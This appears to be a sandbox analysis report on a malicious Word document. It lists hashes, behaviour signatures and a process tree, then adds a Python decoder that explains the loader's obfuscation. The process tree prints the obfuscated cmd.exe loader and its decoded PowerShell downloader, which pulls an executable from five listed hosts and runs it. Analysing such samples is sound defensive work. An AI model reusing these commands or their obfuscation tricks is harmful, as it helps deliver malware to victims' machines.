Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/06/2024, 09:35

General

  • Target

    914c0f87aef05aa403558d1825c3ef02_JaffaCakes118.doc

  • Size

    137KB

  • MD5

    914c0f87aef05aa403558d1825c3ef02

  • SHA1

    5a6bbe6a47b8329c8f88ee7ebbe2e68f41808e93

  • SHA256

    d0a30f503c8a18a5d119b95b9544c294cb023d7287419b4fcc64a41e30ea21ba

  • SHA512

    5279068c51162942faec3d78d9a61b97215fa90f5ae366c5991e6c7e278831430fc068d59a29d6e2b79b91c173aef189ce211140216b5996d8cc5bba9ba7216e

  • SSDEEP

    3072:S8GhDS0o9zTGOZD6EbzCdQq3/I7ChQ1aL1C:8oUOZDlbeQqPIehQ1aL1C

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\914c0f87aef05aa403558d1825c3ef02_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2428
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\djlHiiJvoFIViL\RzjPdOpBsDBQMi\YRLnzqw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $mGS='LNG';$fkc=new-object Net.WebClient;$XJL='http://marquisediamondengagementring.com/Rfg@http://omid1shop.com/2iyjzo@http://nhakhoaucchau.com.vn/riCIYlP8@http://nycfpf.com/2l0@http://mi.bmgu-dev.com/6ai'.Split('@');$jci='Xwo';$PXL = '697';$tza='hNY';$zXA=$env:temp+'\'+$PXL+'.exe';foreach($GNb in $XJL){try{$fkc.DownloadFile($GNb, $zXA);$iLV='WBw';If ((Get-Item $zXA).length -ge 80000) {Invoke-Item $zXA;$TXY='imK';break;}}catch{}}$Fpi='JpA';"
            4⤵
              PID:2984
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=D.j tokens=2" %w IN ('ftype^|find "llDa"') DO %w -"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1580
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ftype|find "llDa"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1884
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ftype"
                  6⤵
                    PID:892
                  • C:\Windows\SysWOW64\find.exe
                    find "llDa"
                    6⤵
                      PID:352
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    PowerShell -
                    5⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:856
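
The cmd.exe command line recorded under PID 2832 (re-spawned unchanged as PID 2820) hides the PowerShell downloader in two layers. `%ProgramData:~0,1%%ProgramData:~9,2%` assembles the string `CmD` from substrings of an environment variable, so the second cmd.exe is launched without the word `cmd` appearing in the parent's command line. The `for %v in (...)` loop then rebuilds the script one character at a time by indexing into the NP alphabet and pipes it into `PowerShell -` (PowerShell reading its script from stdin), with the interpreter's name recovered from `ftype|find "llDa"` rather than written out. The Python below is an added example, not part of the sandbox report, and reproduces both expansions offline. NP and the index list are copied verbatim from the recorded command line; the `%ProgramData%` value and the `ftype` sample lines are constructed stand-ins for what the command resolves against on a default install, and the function names are mine.

```python
"""Decoder for the cmd.exe obfuscation recorded in the process tree above.

Added example, not part of the sandbox report.  NP and INDICES are copied
verbatim from the recorded command line; FTYPE_SAMPLE and the %ProgramData%
value used in __main__ are constructed stand-ins.
"""
import re

# Alphabet held in the NP variable (copied from the recorded command line).
NP = r"wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g"

# Index list from `for %v in (...)`, copied verbatim.  80 is past the end of
# NP, so !NP:~80,1! expands to nothing and `if %v geq 80` fires the echo.
INDICES = (
    "29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,"
    "29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,"
    "52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,"
    "52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,"
    "52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,"
    "52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,"
    "29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,"
    "29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,"
    "22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,"
    "29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,"
    "39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,"
    "39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,"
    "29,17,5,25,70,62,19,5,32,62,45,80"
)

# Constructed sample of `ftype` output.  Assumption: a default install carries a
# Microsoft.PowerShellData.1 association; the paths here are illustrative only.
FTYPE_SAMPLE = [
    'htmlfile="C:\\Program Files\\Internet Explorer\\iexplore.exe" %1',
    'Microsoft.PowerShellData.1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "%1"',
    'Microsoft.PowerShellScript.1="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "%1"',
]


def cmd_substring(value, start, length=None):
    """Emulate cmd.exe %VAR:~start,len% / !VAR:~start,len! substring expansion."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)   # negative start counts from the end
    if length is None:
        e = n
    elif length >= 0:
        e = s + length
    else:
        e = n + length                                # negative length drops a tail
    return value[s:e]                                 # out-of-range start yields ""


def expand_env_substrings(text, env):
    """Resolve every %VAR:~start,len% token in a command line against env."""
    lookup = {k.lower(): v for k, v in env.items()}   # env names are case-insensitive

    def sub(m):
        length = None if m.group(3) is None else int(m.group(3))
        return cmd_substring(lookup[m.group(1).lower()], int(m.group(2)), length)

    return re.sub(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%", sub, text)


def decode_index_table(alphabet, indices):
    """Rebuild the string the for-loop assembles with set P9M=!P9M!!NP:~%v,1!.

    The recorded loop echoes !P9M:~5!.  On the cmd.exe command line an
    undefined !P9M! is left in place as literal text on the first iteration,
    which is the five-character prefix that strip removes; starting from an
    empty accumulator here, nothing needs to be stripped.
    """
    return "".join(cmd_substring(alphabet, i, 1) for i in indices)


def for_f_token(lines, delims, token, needle):
    """Emulate FOR /F "delims=... tokens=N" over `ftype | find "needle"` output.

    `find` without /I is case-sensitive, and FOR /F collapses runs of delimiters.
    """
    for line in lines:
        if needle not in line:
            continue
        parts = [p for p in re.split("[" + re.escape(delims) + "]+", line) if p]
        if len(parts) >= token:
            return parts[token - 1]
    return None


def extract_urls(script):
    """Pull the download URLs out of the decoded PowerShell ('@'-separated list)."""
    return re.findall(r"https?://[^'@]+", script)


def decode_recorded():
    """Decode the recorded loader; returns the PowerShell that was piped to stdin."""
    return decode_index_table(NP, [int(i) for i in INDICES.split(",")])


if __name__ == "__main__":
    env = {"ProgramData": r"C:\ProgramData"}          # constructed default value
    print(expand_env_substrings("%ProgramData:~0,1%%ProgramData:~9,2%", env))
    script = decode_recorded()
    print(script)
    print(extract_urls(script))
    print(for_f_token(FTYPE_SAMPLE, "D.j", 2, "llDa"), "-")
```

The decoded text matches the `echo` command line recorded under PID 2984, and the `for_f_token` emulation explains the `PowerShell -` child under PID 856: splitting the matched ftype line on `D`, `.` and `j` and taking the second token yields `PowerShell`, so the interpreter name never appears in the loader. The same `%VAR:~start,len%` and index-table tricks are reusable by other loaders with different alphabets, which is why the decoder takes the alphabet and index list as inputs rather than hard-coding the result.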

          Network

                MITRE ATT&CK Enterprise v15

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

                  Filesize

                  20KB

                  MD5

                  3e2de4acf445250b86ce8ab2ed776339

                  SHA1

                  278d5f4b6bd4aff3103a89164fae1cb30a2e26d4

                  SHA256

                  cae37eab9f53108c4baa8e1ede2e429975c395e1fee4763dbaa6a167ec97be20

                  SHA512

                  991b13ffbe05d0085b3a3da3b541533c428094efcb32d0a74da0b90a0242d075515429144711ce67f58ce239a2a8d3e1c707e17c0f05c22a0e48efda3784b6d6

                • memory/2020-10-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-2-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB

                • memory/2020-6-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-7-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-11-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-0-0x000000002F4B1000-0x000000002F4B2000-memory.dmp

                  Filesize

                  4KB

                • memory/2020-9-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-8-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-19-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB

                • memory/2020-20-0x0000000000410000-0x0000000000510000-memory.dmp

                  Filesize

                  1024KB

                • memory/2020-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                • memory/2020-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

                  Filesize

                  64KB

                • memory/2020-39-0x0000000070D1D000-0x0000000070D28000-memory.dmp

                  Filesize

                  44KB